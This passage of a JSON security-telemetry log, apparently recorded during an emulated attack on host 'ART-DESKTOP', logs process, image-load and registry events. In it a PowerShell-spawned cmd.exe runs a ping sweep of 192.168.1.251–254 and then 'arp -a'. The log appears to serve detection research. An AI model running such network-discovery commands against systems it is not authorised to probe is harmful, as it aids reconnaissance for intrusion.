"parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573212510000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212610000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "process", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573216840000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.251", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573216990000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "event_type": "process", - "pid": 2988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573221830000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-0010D7025401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.252", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3648, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573221980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "event_type": "process", - "pid": 3648, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573226840000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-001054055401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.253", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573226980000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "event_type": "process", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573227290000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C7075401}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.254", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4220, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573227530000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227450016, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573227610000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "process", - "pid": 4220, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573231990000, - "unique_pid": "{42FC7E13-CBCA-5C05-0000-0010C40A5401}" - }, - { - "event_type": "process", - "pid": 7328, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573231990000, - "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7784, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573232160000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "process", - "pid": 7784, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010490D5401}" - }, - { - "event_type": "file", - "file_name": "CMD.EXE-89305D47.pf", - "file_path": "C:\\Windows\\Prefetch\\CMD.EXE-89305D47.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573232140000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"arp -a\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2008, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573232800000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "command_line": "arp -a", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2080, - "ppid": 2008, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "subtype": "create", - "timestamp": 131883573232890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - 